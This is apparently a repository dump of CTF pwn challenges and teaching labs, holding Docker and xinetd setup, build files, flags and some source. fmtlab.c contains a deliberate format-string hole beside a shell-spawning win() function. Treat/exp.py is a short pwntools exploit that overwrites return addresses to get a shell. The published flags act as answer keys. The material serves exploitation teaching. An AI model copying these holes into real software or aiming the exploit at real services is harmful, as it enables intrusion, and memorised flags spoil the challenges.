/MyChallenges/Pwn/TeachingLabs/GOTlab/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:disco-20200114 2 | MAINTAINER James 3 | 4 | RUN sed -i -re 's/([a-z]{2}\.)?archive.ubuntu.com|security.ubuntu.com/old-releases.ubuntu.com/g' /etc/apt/sources.list && \ 5 | apt-get update && \ 6 | DEBIAN_FRONTEND=noninteractive apt-get install -qy xinetd 7 | RUN useradd -m GOTlab 8 | RUN chown -R root:root /home/GOTlab 9 | RUN chmod -R 755 /home/GOTlab 10 | 11 | CMD ["/usr/sbin/xinetd","-dontfork"] 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/GOTlab/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | gotlab: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/GOTlab:ro 8 | - ./xinetd:/etc/xinetd.d/gotlab:ro 9 | ports: 10 | - "30103:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/GOTlab/distribute/share/GOTlab: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/TeachingLabs/GOTlab/distribute/share/GOTlab -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/GOTlab/distribute/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{loop_and_loop_and_loop} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/GOTlab/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/GOTlab/GOTlab 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/GOTlab/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service gotlab 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/GOTlab/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = GOTlab 10 | port = 10101 11 | flags = REUSE 12 | } 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/GOTlab/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc -Wl,-z,relro -no-pie -fstack-protector-all GOTlab.c -o GOTlab 3 | strip GOTlab 4 | 5 | clean: 6 | rm GOTlab 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/ROPlab/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | ROPlab 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | plain ROP 9 | 10 | Estimated Difficulty : 11 | 0/10 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/ROPlab/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:disco-20200114 2 | MAINTAINER James 3 | 4 | RUN sed -i -re 's/([a-z]{2}\.)?archive.ubuntu.com|security.ubuntu.com/old-releases.ubuntu.com/g' /etc/apt/sources.list && \ 5 | apt-get update && \ 6 | DEBIAN_FRONTEND=noninteractive apt-get install -qy xinetd 7 | RUN useradd -m ROPlab 8 | RUN chown -R root:root /home/ROPlab 9 | RUN chmod -R 755 /home/ROPlab 10 | 11 | CMD ["/usr/sbin/xinetd","-dontfork"] 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/ROPlab/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | roplab: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/ROPlab:ro 8 | - ./xinetd:/etc/xinetd.d/roplab:ro 9 | ports: 10 | - "30102:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/ROPlab/distribute/share/ROPlab: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/TeachingLabs/ROPlab/distribute/share/ROPlab -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/ROPlab/distribute/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{leak_and_ROP} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/ROPlab/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/ROPlab/ROPlab 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/ROPlab/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service roplab 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/ROPlab/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = ROPlab 10 | port = 10101 11 | flags = REUSE 12 | } 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/ROPlab/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc -Wl,-z,now -fpie -fstack-protector-all ROPlab.c -o ROPlab 3 | strip ROPlab 4 | 5 | clean: 6 | rm ROPlab 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/fastbinlab/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | fastbinlab 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | need for speed 9 | 10 | Estimated Difficulty : 11 | 0/10 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/fastbinlab/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:focal 2 | MAINTAINER James 3 | 4 | RUN apt-get update 5 | RUN apt-get install xinetd -qy 6 | RUN useradd -m fastbinlab 7 | RUN chown -R root:root /home/fastbinlab 8 | RUN chmod -R 755 /home/fastbinlab 9 | 10 | CMD ["/usr/sbin/xinetd","-dontfork"] 11 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/fastbinlab/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | fastbinlab: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/fastbinlab:ro 8 | - ./xinetd:/etc/xinetd.d/fastbinlab:ro 9 | ports: 10 | - "30105:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/fastbinlab/distribute/share/fastbinlab: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/TeachingLabs/fastbinlab/distribute/share/fastbinlab -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/fastbinlab/distribute/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{take_the_blue_pill_you_stay_safe_take_the_red_pill_godspeed_to_shell} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/fastbinlab/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/fastbinlab/fastbinlab 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/fastbinlab/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service fastbinlab 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/fastbinlab/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = fastbinlab 10 | port = 10101 11 | flags = REUSE 12 | } 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/fastbinlab/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc -Wl,-z,now -fpie -fstack-protector-all fastbinlab.c -o fastbinlab 3 | strip fastbinlab 4 | 5 | clean: 6 | rm fastbinlab 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/fmtlab/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | fmtlab 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | even ssl VPN makes mistakes 9 | 10 | Estimated Difficulty : 11 | 0/10 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/fmtlab/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:disco-20200114 2 | MAINTAINER James 3 | 4 | RUN sed -i -re 's/([a-z]{2}\.)?archive.ubuntu.com|security.ubuntu.com/old-releases.ubuntu.com/g' /etc/apt/sources.list && \ 5 | apt-get update && \ 6 | DEBIAN_FRONTEND=noninteractive apt-get install -qy xinetd 7 | RUN useradd -m fmtlab 8 | RUN chown -R root:root /home/fmtlab 9 | RUN chmod -R 755 /home/fmtlab 10 | 11 | CMD ["/usr/sbin/xinetd","-dontfork"] 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/fmtlab/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | fmtlab: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/fmtlab:ro 8 | - ./xinetd:/etc/xinetd.d/fmtlab:ro 9 | ports: 10 | - "30104:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/fmtlab/distribute/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{fmt_all_the_way} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/fmtlab/distribute/share/fmtlab: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/TeachingLabs/fmtlab/distribute/share/fmtlab -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/fmtlab/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/fmtlab/fmtlab 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/fmtlab/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service fmtlab 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/fmtlab/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = fmtlab 10 | port = 10101 11 | flags = REUSE 12 | } 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/fmtlab/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc -Wl,-z,now -fpie -fstack-protector-all fmtlab.c -o fmtlab 3 | strip fmtlab 4 | 5 | clean: 6 | rm fmtlab 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/fmtlab/sourcecode/fmtlab.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | void initproc(){ 5 | setvbuf(stdin,NULL,_IONBF,0); 6 | setvbuf(stdout,NULL,_IONBF,0); 7 | setvbuf(stderr,NULL,_IONBF,0); 8 | return; 9 | } 10 | 11 | void win(){ 12 | system("/bin/sh"); 13 | return; 14 | } 15 | 16 | int main(){ 17 | initproc(); 18 | int end=1; 19 | char buf[0x20]; 20 | while(end){ 21 | printf("Your message : "); 22 | scanf("%31s",buf); 23 | printf(buf); 24 | } 25 | return 0; 26 | } 27 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/shelllab/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | shelllab 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | open read write 9 | 10 | Estimated Difficulty : 11 | 0/10 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/shelllab/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:disco-20200114 2 | MAINTAINER James 3 | 4 | RUN sed -i -re 's/([a-z]{2}\.)?archive.ubuntu.com|security.ubuntu.com/old-releases.ubuntu.com/g' /etc/apt/sources.list && \ 5 | apt-get update && \ 6 | DEBIAN_FRONTEND=noninteractive apt-get install -qy xinetd 7 | RUN useradd -m shelllab 8 | RUN chown -R root:root /home/shelllab 9 | RUN chmod -R 755 /home/shelllab 10 | 11 | CMD ["/usr/sbin/xinetd","-dontfork"] 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/shelllab/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | shelllab: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/shelllab:ro 8 | - ./xinetd:/etc/xinetd.d/shelllab:ro 9 | ports: 10 | - "30101:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/shelllab/distribute/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{easiest_shellcode_possible} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/shelllab/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/shelllab/shelllab 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/shelllab/distribute/share/shelllab: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/TeachingLabs/shelllab/distribute/share/shelllab -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/shelllab/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service shelllab 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/shelllab/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = shelllab 10 | port = 10101 11 | flags = REUSE 12 | } 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/shelllab/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | wget https://raw.githubusercontent.com/jwang-a/CTF/master/utils/Pwn/SECCOMP.h 3 | gcc -Wl,-z,now -fpie -fstack-protector-all shelllab.c -o shelllab 4 | strip shelllab 5 | rm SECCOMP.h 6 | 7 | clean: 8 | rm shelllab 9 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/stashlab/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | stashlab 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | one vuln to break it all 9 | 10 | Estimated Difficulty : 11 | 0/10 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/stashlab/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:focal 2 | MAINTAINER James 3 | 4 | RUN apt-get update 5 | RUN apt-get install xinetd -qy 6 | RUN useradd -m stashlab 7 | RUN chown -R root:root /home/stashlab 8 | RUN chmod -R 755 /home/stashlab 9 | 10 | CMD ["/usr/sbin/xinetd","-dontfork"] 11 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/stashlab/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | stashlab: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/stashlab:ro 8 | - ./xinetd:/etc/xinetd.d/stashlab:ro 9 | ports: 10 | - "30107:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/stashlab/distribute/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{non_secure_stashing_leads_to_heap_bashing} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/stashlab/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/stashlab/stashlab 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/stashlab/distribute/share/stashlab: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/TeachingLabs/stashlab/distribute/share/stashlab -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/stashlab/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service stashlab 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/stashlab/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = stashlab 10 | port = 10101 11 | flags = REUSE 12 | } 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/stashlab/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc -Wl,-z,now -fpie -fstack-protector-all stashlab.c -o stashlab 3 | strip stashlab 4 | 5 | clean: 6 | rm stashlab 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/tcachelab/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | tcachelab 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | faster than fastbin 9 | 10 | Estimated Difficulty : 11 | 0/10 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/tcachelab/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:focal 2 | MAINTAINER James 3 | 4 | RUN apt-get update 5 | RUN apt-get install xinetd -qy 6 | RUN useradd -m tcachelab 7 | RUN chown -R root:root /home/tcachelab 8 | RUN chmod -R 755 /home/tcachelab 9 | 10 | CMD ["/usr/sbin/xinetd","-dontfork"] 11 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/tcachelab/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | tcachelab: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/tcachelab:ro 8 | - ./xinetd:/etc/xinetd.d/tcachelab:ro 9 | ports: 10 | - "30106:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/tcachelab/distribute/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{key_am_i_a_joke_to_you} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/tcachelab/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/tcachelab/tcachelab 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/tcachelab/distribute/share/tcachelab: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/TeachingLabs/tcachelab/distribute/share/tcachelab -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/tcachelab/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service tcachelab 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/tcachelab/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = tcachelab 10 | port = 10101 11 | flags = REUSE 12 | } 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/tcachelab/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc -Wl,-z,now -fpie -fstack-protector-all tcachelab.c -o tcachelab 3 | strip tcachelab 4 | 5 | clean: 6 | rm tcachelab 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Treat/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Treat 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | We sell all kinds of treat here, would you care to try our flagship coffee? 9 | p.s. It is not only delicious, but also environment friendly 10 | 11 | Estimated Difficulty : 12 | 0/10 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Treat/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:19.04 2 | 3 | RUN apt-get update 4 | RUN apt-get dist-upgrade -y 5 | RUN apt-get install socat -y 6 | 7 | COPY libc64_2.29.so /lib/x86_64-linux-gnu/libc-2.29.so 8 | COPY ld64_2.29.so /lib64/ld-linux-x86-64.so.2 9 | 10 | RUN useradd -m treat 11 | COPY treat flag /home/treat/ 12 | RUN chown -R root:treat /home/treat 13 | RUN chmod -R 750 /home/treat/ 14 | EXPOSE 4444 15 | USER treat 16 | CMD socat -T30 TCP-LISTEN:4444,reuseaddr,fork EXEC:/home/treat/treat 17 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Treat/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ###Addr 4 | # libc2.29 5 | name_buf = 0x405080 6 | func = 0x401186 7 | 8 | ###Exploit 9 | r = process('./treat') 10 | 11 | r.sendlineafter('name : ','TREAT=/bin/sh') 12 | r.sendlineafter('(1~3) : ',b'1'*0x138+p64(name_buf)[:3]) 13 | r.sendlineafter('feedback : ',b'1'*0x48+p64(func)[:3]) 14 | r.interactive() 15 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Treat/flag: -------------------------------------------------------------------------------- 1 | FLAG{Halloween+Thanksgiving+XMas=Treats!!!!} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Treat/treat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Treat/treat -------------------------------------------------------------------------------- /MyChallenges/Pwn/Unicorns_Aisle/UnicornsAisle.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Unicorns_Aisle/UnicornsAisle.pdf -------------------------------------------------------------------------------- /MyChallenges/Pwn/Unicorns_Aisle/distribute/DISTNOTE: -------------------------------------------------------------------------------- 1 | unicorn engine commit : 3fadb5aa5aad22926f5f816dbe396f8661990374 2 | docker ubuntu hash : ba6acccedd29 3 | 4 | since mapping layout is highly delicate and changes with docker setup, keep hash here for reference 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Unicorns_Aisle/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:focal 2 | MAINTAINER James 3 | 4 | ENV DEBIAN_FRONTEND noninteractive 5 | 6 | RUN apt-get update 7 | RUN apt-get install xinetd -y 8 | RUN useradd -m UnicornsAisle 9 | 10 | CMD ["/usr/sbin/xinetd","-dontfork"] 11 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Unicorns_Aisle/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | unicornsaisle: 5 | build: . 6 | volumes: 7 | - ./share:/home/UnicornsAisle:ro 8 | - ./libunicorn.so.1:/lib/x86_64-linux-gnu/libunicorn.so.1 9 | - ./xinetd:/etc/xinetd.d/unicornsaisle:ro 10 | ports: 11 | - "10101:10101" 12 | expose: 13 | - "10101" 14 | restart: always 15 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Unicorns_Aisle/distribute/libunicorn.so.1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Unicorns_Aisle/distribute/libunicorn.so.1 -------------------------------------------------------------------------------- /MyChallenges/Pwn/Unicorns_Aisle/distribute/share/encounter.emu: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Unicorns_Aisle/distribute/share/encounter.emu -------------------------------------------------------------------------------- /MyChallenges/Pwn/Unicorns_Aisle/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | exec 2>/dev/null 4 | 5 | cd /home/UnicornsAisle/ 6 | timeout 99 /home/UnicornsAisle/unicornsAisle /home/UnicornsAisle/encounter.emu 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Unicorns_Aisle/distribute/share/unicornInterlude: -------------------------------------------------------------------------------- 1 | BALSN{Unl34sh_cha1n_0f_m4gic_4nd_achi3ve_7h3_1mp055ibl3} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Unicorns_Aisle/distribute/share/unicornPostlude: -------------------------------------------------------------------------------- 1 | BALSN{r4m_4_bl0ck_1nt0_th3_illus10n_0f_invinc1bil1ty} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Unicorns_Aisle/distribute/share/unicornPrelude: -------------------------------------------------------------------------------- 1 | BALSN{7h3_un1c0rn_qu1v3rs_4nd_f4lls_und3r_y0ur_sw0rd} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Unicorns_Aisle/distribute/share/unicornsAisle: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Unicorns_Aisle/distribute/share/unicornsAisle -------------------------------------------------------------------------------- /MyChallenges/Pwn/Unicorns_Aisle/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service unicornsaisle 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/UnicornsAisle/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = UnicornsAisle 10 | port = 10101 11 | flags = REUSE 12 | } 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Unicorns_Aisle/sourcecode/Server/build.sh: -------------------------------------------------------------------------------- 1 | #gcc (GCC) 11.1.0 2 | gcc -g main.c handler.c ucutils.c mem.c utils.c -I./unicorn/include/ -L./unicorn/ -o unicornsAisle -lunicorn -lpthread 3 | strip unicornsAisle 4 | nasm -f elf64 -o encounter.o encounter.S 5 | ld encounter.o -o encounter.bin --oformat=binary 6 | printf "\x08\x00\x00\x00\x00\x00\x00\x00" | cat - encounter.bin > encounter.emu 7 | rm encounter.bin encounter.o 8 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Unicorns_Aisle/sourcecode/Server/guestcontext.h: -------------------------------------------------------------------------------- 1 | #ifndef __GUESTCONTEXT_HEADER__ 2 | #define __GUESTCONTEXT_HEADER__ 3 | 4 | #include 5 | #include"mem.h" 6 | 7 | #define NOTENTRY (0) 8 | #define NOENTRY ((void*)0) 9 | 10 | typedef struct GUESTCONTEXT{ 11 | void *canaryPage; 12 | void *brk; 13 | void *stackBottom; 14 | MEMLIST *sysMemList; 15 | MEMLIST *usrMemList; 16 | void *entry; 17 | uc_engine *uc; 18 | }GUESTCONTEXT; 19 | 20 | #endif 21 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Unicorns_Aisle/sourcecode/Server/main.h: -------------------------------------------------------------------------------- 1 | #ifndef __MAIN_HEADER__ 2 | #define __MAIN_HEADER__ 3 | 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include"utils.h" 12 | #include"guestcontext.h" 13 | #include"mem.h" 14 | #include"ucutils.h" 15 | #include"handler.h" 16 | 17 | #endif 18 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Unicorns_Aisle/sourcecode/Server/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | LD_LIBRARY_PATH=./unicorn/ ./unicornsAisle ./encounter.emu 3 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Unicorns_Aisle/sourcecode/Server/utils.h: -------------------------------------------------------------------------------- 1 | #ifndef __UTILS_HEADER__ 2 | #define __UTILS_HEADER__ 3 | 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | #define MIN(x,y) (x>y?x:y) 10 | 11 | void printError(char *msg); 12 | size_t getRand(int width); 13 | 14 | #endif 15 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Variable_Machine_Revenge/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:disco-20200114 2 | MAINTAINER James 3 | 4 | RUN sed -i -re 's/([a-z]{2}\.)?archive.ubuntu.com|security.ubuntu.com/old-releases.ubuntu.com/g' /etc/apt/sources.list && \ 5 | apt-get update && \ 6 | DEBIAN_FRONTEND=noninteractive apt-get install -qy xinetd 7 | RUN useradd -m VMRevenge 8 | RUN chown -R root:root /home/VMRevenge 9 | RUN chmod -R 755 /home/VMRevenge 10 | 11 | CMD ["/usr/sbin/xinetd","-dontfork"] 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Variable_Machine_Revenge/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | vmrevenge: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/VMRevenge:ro 8 | - ./xinetd:/etc/xinetd.d/variable_machine_revenge:ro 9 | ports: 10 | - "10105:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Variable_Machine_Revenge/distribute/share/flag: -------------------------------------------------------------------------------- 1 | flag{thr3ad1ng_w17h0ut_10ck_15_5o0O0o0oO_d4ng3r0us} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Variable_Machine_Revenge/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/VMRevenge/variable_machine_revenge 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Variable_Machine_Revenge/distribute/share/variable_machine_revenge: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Variable_Machine_Revenge/distribute/share/variable_machine_revenge -------------------------------------------------------------------------------- /MyChallenges/Pwn/Variable_Machine_Revenge/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service variable_machine_revenge 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/VMRevenge/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = 